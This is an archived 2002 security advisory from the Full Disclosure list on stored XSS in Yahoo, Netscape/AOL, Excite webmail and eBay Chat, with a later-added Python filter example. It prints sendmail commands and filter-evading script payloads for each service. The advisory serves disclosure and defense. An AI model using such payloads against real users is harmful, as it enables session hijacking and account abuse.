Full Disclosure mailing list archives

iDEFENSE Security Advisory: Cross-Site Scripting Vulnerabilities in Popular Web Applications


From: full-disclosure@lists.netsys.com (David Endler)
Date: Mon, 19 Aug 2002 08:39:49 -0400

iDEFENSE Security Advisory 08.19.2002
Cross-Site Scripting (XSS) Vulnerabilities in Popular Web Applications

Yahoo Mail      http://mail.yahoo.com
Netscape Mail   http://webmail.netscape.com
AOL Webmail     http://webmail.aol.com (same as Netscape Mail)
Excite Mail     http://mail.excite.com
eBay Chat       http://pages.ebay.com/community/chat/index.html


DESCRIPTION 

Many web applications generate dynamic HTML pages from 
user-submitted data and other sources of "untrusted content." 
A web application that does not meticulously filter this 
untrusted content before presenting the page to the user may 
allow an attacker to manipulate the page and the way a web 
browser interprets its content.

This issue becomes dangerous when untrusted content can be 
inserted into a dynamic HTML page via a web application or 
other means, causing potentially malicious code to execute 
within a user's browser with the exact same privileges as the 
legitimate web server.

Some web applications, such as Yahoo Mail, already 
meticulously filter incoming untrusted data before the content 
reaches their users. However, given the loose interpretation 
of HTML, JavaScript, VBScript, etc. by various web browsers, 
obfuscated content may elude the current filters and execute 
within the user's browser environment.

This allows an attacker to target users almost instantly, 
without relying on the user performing any activity other than 
normal usage. All vulnerabilities affect Microsoft Internet 
Explorer, Netscape, or both. These types of XSS 
vulnerabilities are usually classified as "constant-state", 
as they persist for more than just one HTTP request. More 
detailed XSS exploitation scenarios are described in an 
iDEFENSE paper available at http://www.idefense.com/XSS.html.


ANALYSIS

*** Yahoo Mail ***

The following XSS vulnerability only existed for Netscape 4.x 
browsers (see Vendor Response; this issue in Yahoo has since 
been addressed):

bash$ sendmail -t target@yahoo.com

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<ILAYER SRC="script.js"></ILAYER>


</BODY></HTML>
.
--------------------------------------------------



*** Netscape/AOL Webmail ***

This XSS vulnerability exists in Netscape Mail 
(webmail.netscape.com) and AOL Webmail (webmail.aol.com).  The 
following XSS behavior can be caused in both IE 5.x/6.x and 
Netscape 4.x:

bash$ sendmail -t target@netscape.net

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<IMG SRC="javasc&#X0A;ript:alert('test');">

</BODY></HTML>
.
--------------------------------------------------



*** Excite Webmail ***

It would seem that Excite does not perform any filtering of 
HTML/SCRIPT whatsoever.  The following XSS behavior can be 
caused in both IE 5.x/6.x and Netscape 4.x/6.x:

bash$ sendmail -t target@excite.com

Paste the following email message
--------------------------------------------------
MIME-Version: 1.0
From: Attack <attacker@foo.com>
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit
Subject: XSS Attack

<HTML><BODY>

<SCRIPT>alert(document.domain);</SCRIPT>

</BODY></HTML>
.
--------------------------------------------------



*** eBay Chat ***

While logged in as an eBay user, place the text string below 
in the chat text field and click submit. The message will 
appear in the main chat window and will execute in a user's 
browser when read. The following XSS behavior can be caused 
in both IE 5.x/6.x and Netscape 4.x:

---- XSS String ------------------------------------
<IMG SRC="javasc&#X0A;ript:alert(document.domain);">
----------------------------------------------------
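The three payload shapes above defeat a filter in three different ways: an unfiltered tag (SCRIPT), a browser-specific tag (ILAYER), and a URL scheme broken up with a character reference (javasc&#X0A;ript:) that the browser reassembles after a literal-string filter has already let it through. As an added example (not part of the advisory and not any vendor's code), the following Python check normalizes attribute URLs the way the browser does, decoding references and dropping the control characters IE 5.x/6.x and Netscape 4.x ignored inside a scheme, and combines that with a tag allow-list; the policy sets, sample body and all function names are assumptions made for this example.

```python
import html
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Assumed renderer policy (constructed for this example, not any vendor's).
ALLOWED_TAGS = {"html", "body", "p", "br", "b", "i", "a", "img"}
SAFE_SCHEMES = {"http", "https", "mailto"}
URL_ATTRS = {"src", "href"}

# IE 5.x/6.x and Netscape 4.x dropped control characters inside a URL scheme,
# which is why "javasc<LF>ript:" still executed as JavaScript.
_SCHEME_NOISE = re.compile(r"[\x00-\x20]")

# Constructed message body modelled on the advisory's IMG payload.
SAMPLE_BODY = '<HTML><BODY><IMG SRC="javasc&#X0A;ript:alert(\'test\');"></BODY></HTML>'

def naive_blocks(url):
    """Literal-prefix check of the kind the advisory's payloads slip past."""
    return url.lower().startswith("javascript:")

def normalize_url(url):
    """See the URL as the browser will: decode character references such as
    &#X0A;, then drop the characters the browser ignores in the scheme."""
    return _SCHEME_NOISE.sub("", html.unescape(url)).strip().lower()

def is_safe_url(url):
    scheme = urlsplit(normalize_url(url)).scheme
    return scheme == "" or scheme in SAFE_SCHEMES  # relative URLs are fine

class PolicyChecker(HTMLParser):
    """Records every tag or URL-bearing attribute that violates the policy."""
    def __init__(self):
        super().__init__()
        self.violations = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:           # catches ILAYER and SCRIPT
            self.violations.append("tag:" + tag)
            return
        for name, value in attrs:             # catches the obfuscated IMG SRC
            if name in URL_ATTRS and value and not is_safe_url(value):
                self.violations.append(tag + "@" + name)

def find_violations(document):
    """Return the policy violations found in one HTML message body."""
    checker = PolicyChecker()
    checker.feed(document)
    return checker.violations
```

An allow-list of tags and schemes, applied after normalization, is the durable fix; a deny-list of literal strings will keep losing to browser quirks like the ones this advisory documents.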



DISCOVERY CREDIT

Jeremiah Grossman (jeremiah@whitehatsec.com)
Lex Arquette (lex@whitehatsec.com)


VENDOR RESPONSE

July 16, 2002 - Scott Renfro (scottr@yahoo-inc.com), title 
"Paranoid Yahoo", responded and the issue was fixed.


DISCLOSURE TIMELINE

June 27, 2002           Exclusively Disclosed to iDEFENSE
July 16, 2002           Ebay, AOL/Netscape, Yahoo, and Excite notified
July 16, 2002           iDEFENSE Client Disclosure
August 11, 2002         Second notice given to Excite, AOL/Netscape, and eBay through web customer service suggestion systems
August 19, 2002         Still no response from Excite, AOL/Netscape, or eBay - Public Disclosure




http://www.idefense.com/contributor.html

David Endler, CISSP
Director, Technical Intelligence
iDEFENSE, Inc.
14151 Newbrook Drive
Suite 100
Chantilly, VA 20151
voice: 703-344-2632
fax: 703-961-1071

dendler@idefense.com
www.idefense.com



